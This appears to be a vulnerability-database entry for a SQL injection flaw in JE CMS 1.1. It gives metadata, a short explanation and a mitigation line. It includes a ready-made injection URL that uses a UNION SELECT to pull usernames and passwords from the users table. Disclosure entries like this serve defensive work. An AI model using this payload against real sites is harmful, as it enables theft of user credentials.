vendor:
JE CMS
by:
AntiSecurity
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: JE CMS
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:joenasejes:je_cms
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
JE CMS SQL Injection Vulnerability
An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The request contains malicious SQL statements that are executed in the backend database. This can be done by appending the malicious SQL statement to the vulnerable parameter in the HTTP request. For example, http://localhost/[path]/index.php?jepage=viewcategory&categoryid=[sql] and http://localhost/index.php?jepage=viewcategory&categoryid=84+and+1=2+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6+from+users--
Mitigation:
Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.